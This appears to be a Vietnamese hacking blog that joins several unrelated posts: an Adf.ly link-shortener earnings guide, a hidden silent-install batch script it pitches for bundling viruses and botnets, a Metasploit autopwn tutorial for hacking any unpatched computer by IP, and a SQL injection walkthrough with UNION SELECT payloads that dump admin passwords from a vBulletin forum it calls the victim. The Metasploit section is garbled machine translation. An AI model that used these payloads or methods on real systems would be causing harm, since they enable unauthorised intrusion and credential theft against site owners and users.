Giao diện trang chủ sẽ hiển thị chi tiết thu nhập cũng như hiệu quả của từng link theo từng ngày, bạn nên vào Account cập nhật chính xác thông tin cá nhân để tiện việc thanh toán sau này.

Cách thực hiện cũng rất đơn giản, sau khi đăng nhập tại trang chủ Adf.ly bạn nhập link gốc muốn rút gọn vào khung, ở đây Adf mặc định dang Domain: adf.ly và Advertising Type: Interstitial Advert ($$$$$), bạn có một số tùy chọn thay đổi thông số mặc định đó trước khi rút ngắn nó. Bạn click More option... để tùy chọn

- Domain: Ở đây bạn chọn dạng tên miền cho link sau khi bạn rút gọn (Adf.ly, j.gs hoặc q.gs) mặc định là adf.ly.
- Advertising Type có 3 lựa chọn:
+ Interstitial Advert ($$$$$): Đây là loại mặc định và đây loại hiển thị toàn trang, tức là khi người dùng click vào link rút gọn đó thì trang quảng cáo dạng full hiện ra và cần phải chờ khoản 5 giây, sau đó người dùng nhấn SKIP ADS thì sẽ được chuyển đến link gốc và bạn sẽ nhận được tiền. Đây là hình thức trả tiền khá cao nhưng hơi phiền cho người xem. Bạn có thể click vào link này để xem thử http://adf.ly/KwTvC
+ Framed Banner ($$$): Loại này ít làm khó chịu người xem hơn nhưng nhận tiền thấp hơn loại ban đầu. Loại này sẽ hiển thị một khung nhỏ bên trên trang gốc, người dùng có thể xem được trang của link gốc bên dưới. Link xem thử: http://adf.ly/KwTvC
+ No Advert: Đây là dạng dùng cho mục đích muốn rút gọn link, sẽ không có tiền với hình thức này khi người dùng click vào link. Nó không có quảng cáo và nó sẽ được chuyển thẳng đến link gốc. Link xem thử: http://adf.ly/KwTvC
- Custom Name: Tên tùy biến cho link, đây không quan trọng, bạn không cần quan tâm.

Sau khi đã tùy biến xong, bạn chọn Shrink để rút gọn link.

Sau khi rút gọn link bạn sẽ nhận được link rút gọn dạng như bên dưới.

Công việc tiếp theo là bạn chỉ cần copy link này và giới thiệu đến mọi người với nhiều hình thức và phương tiện khác nhau, có thể qua web/blog/forum hoặc các mạng xã hội Facebook, Tweet..., bạn làm sao người khác có thể tiếp cần và người khác có thể click vào link của bạn bạn càng nhiều càng tốt. Link càng ”hot” thì thu nhập càng nhiều.

Lượt view + giá tiền sẽ được tính theo từng nước. Cụ thể là các bạn xem tại đây.

Ngoài ra trong mục "Tools" có nhiều công cụ giúp bạn kiếm tiền, để lần sau mình giới thiệu với các bạn

Cách rút tiền từ adf.ly

Khi bạn đủ điều kiện thanh toán (kiếm được 5$) bạn có thể yêu cầu rút tiền. Click vào Withdraw

Adf.Fly chấp nhận thanh toán qua ArletPay và Paypal, tự động thanh toán cho bạn vào thứ 2 đầu tuần và tối thiểu là 5$ hoặc nhiều hơn. Giá trị mỗi click vào link phụ thuộc vào Advert Type bạn chọn cho link, quốc gia của người click vào link bạn có thể tham khảo tại đây http://adf.ly/rates.php

Kết luận :
Đây là dịch vụ kiếm tiền khá đơn giản, công việc của bạn là rút gọn link và chia sẻ. Thu nhập sẽ phụ thuộc vào lượt xem link của bạn và từng quốc gia. USA và UK vẫn là 2 quốc gia được ưu tiên nhất. Chúc các bạn bội thu với Adf.fly một hình thức kiếm tiền trực tuyến khá thú vị!

Thứ Hai, 25 tháng 2, 2013

Tự động cài đặt âm thầm nhiều phần mềm chạy cùng 1 lúc

Dùng để blind virus/trojan/botnet được đấy.

+ Chuẩn bi:
- Một số phần mềm quan trọng của mình hay dùng ( vd: Winrar, Yahoo, Unikey, VietKey...)
- Tools Universal Silent Switch Finder 1.5.0.0 để kiểm tra mã Silent Switch ( Down ở file đính kèm )
ussf.rar

+ Thực Hiện
- Sau khi chuẩn bị 1 số phần mềm của mình hay dùng rồi và cho gộp chung một thư mục Setup
- Down Tools Universal Silent Switch Finder 1.5.0.0 và mở nó lên, nhấn vào nut > ở ô File, cuối cùng chọn tới setup phần mềm. sau đó dợi một lúc ở ô Usage sẽ xuất hiện mã Silent Switch
- Ví dụ tôi chọn Winrar401b1.exe thì có mã Silent Switch là /S

- Sau khi đã có mã Silent Switch thì thực hiện như sau:
Mở notepad lên ( Start/run gõ notepad ) rồi dán code này vào

@ECHO OFF

IF EXIST %WinDir%\System32\CMDOW.EXE CMDOW @ /HID

START /WAIT [Tên file phần mềm 1] [Mã Silent Switch 1]

START /WAIT [Tên file phần mềm 2] [Mã Silent Switch 2]

EXIT

Sau đó nhấn phím Ctrl + S. Ở ô File name điền Install.bat, ở ô File as type chọn all file, nhấn vào SAVE và cuối cùng chọn tới thư mục Setup

Ví dụ của tôi thì làm như thế này

@ECHO OFF

IF EXIST %WinDir%\System32\CMDOW.EXE CMDOW @ /HID

START /WAIT wrar401b1.exe /S

START /WAIT teracopy.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-

EXIT

Hack Bất kỳ máy tính Với ip one [MetaSploit]

Tôi ở đây để cho bạn thấy công cụ này huyền diệu gọi là Metasploit, cho phép bạn để hack máy tính ANYunpatched với IP của nó chỉ. Cho phép bắt đầu ...
1) Đầu tiên bạn cần phải tải về Metasploit. Nhất up-to-date là phiên bản miễn phí tại metasploit.com
2.) cần PostgrSQL cho cơ sở dữ liệu của bạn. Tải về tại đây:
Code:
http://www.postgresql.org/
.
Hãy chắc chắn rằng bạn sử dụng tất cả các giá trị mặc định hoặc làm việc woun't Metasploit
3) Bây giờ cho phép nhận được xuống để buisness ... Sau khi cài đặt cả hai công cụ, mở gui quản trị PostgrSQL (bắt đầu -> tất cả các chương trình -> PostgreSQL 9,0 -> pgAdmin III) . Sau đó, nhấp chuột phải vào máy chủ của bạn (hộp tay trái) và nhấp vào kết nối. Hãy nhớ để giữ cho cửa sổ này mở toàn bộ thời gian. Bạn cũng sẽ cần vượt qua bạn đã chọn để sử dụng trong bước 5 ...

4) Thời gian cho một số hacking. Go để bắt đầu -> tất cả các chương trình -> Metasploit Framework, và sau đó mở Metasploit gui. Hãy để nó tải cho đến khi nó trông như thế này:

5) Bây giờ, trong các loại cửa sổ: db_connect postgres: ThePassYouChose @ localhost: 5432 Lần đầu tiên bạn làm điều này bạn sẽ thấy rất nhiều mua flash văn bản. Không wory, điều này là bình thường.

6) Loại db_host để chắc chắn rằng bạn đang kết nối correctally
. 7) Bây giờ loại này:
db_nmap 000.000.000.000
Hãy chắc chắn rằng bạn đặt IP của máy tính bạn đang cố gắng để hack trong nơi 000.000.000.000 ...
7) Now. chúng tôi nhận được các phần thú vị, khai thác tự động. Chỉ cần gõ db_autopwn-t-p-e-s-b, xem bắt đầu tự động khai thác, đi chơi Halo trong một thời gian, và sau đó quay trở lại ...
8) Sau khi khai thác được thực hiện, loại phiên-l để xem những gì máy quét được tìm thấy. Nếu tất cả đều tốt, bạn sẽ thấy một danh sách khai thác.
9.) Bây giờ chúng tôi nhận được để sử dụng khai thác để hack máy tính! Nếu bạn sẽ nhận thấy, tất cả các khai thác số, và tất cả họ đều có tên rõ ràng (ví dụ, reverseScreen_tcp). Để sử dụng khai thác, loại này:
phiên-i ExploitNumber

Thứ Sáu, 1 tháng 2, 2013

Hàm truy vấn Bug Topx vbb

Định ko post TUT này sớm nhưng dù sao cũng có người làm hướng dẫn rồi nên post luôn cho ae.

Không hide

Chú ý là đừng mang đi phá người ta quá nhé
Ở diễn đàn có sử dụng mod changuondyu static. Ví dụ: http://forumvictim.com/forum
Bạn truy cập vào: http://forumvictim.com/forum/ajax.ph...nforum&result=10&listforumid=123

2 kái chữ bôi đỏ các bạn thay cho phù hợp (Ra ngoài forum home xem victim để giá trị result như nào, listforumid thì các bạn lấy 1 id chuyên mục của victim)

Tiếp theo bạn thử thêm dấu đóng ngoặc " ) " vào sau xem, nếu nó lỗi tức là site chưa fix

Mã:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123

Nếu đã lỗi rồi thì các bạn thực hiện order by để tìm column:

Mã:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) ORDER BY 11-- -

Bạn thay số 11 đỏ ở kia = số phù hợp, sao cho đó là số lớn nhất có thể mà khi đó ko bị lỗi (Thường thì là 10)

Giả sử mình đã tìm đc giá trị đó là 10 rồi thì tiếp theo sẽ select thôi.

Mã:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(password),3,4,5,6,7,8,9,10 FROM user WHERE userid=1-- -

(Bạn có thể thử thay cái group_concat vào các số 6 hay 7 để hiển thị đc kquả tốt nhất)

Nếu xảy ra lỗi thì có thể forum này họ để VBB TABLE PREFIX, tức là table của họ ko phải dạng user nữa mà là kiểu như dct_user chẳng hạn, lúc này ta tìm tên table = cách:

Mã:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables-- -

=> Xem tiền tố table là gì rồi bắt đầu khai thác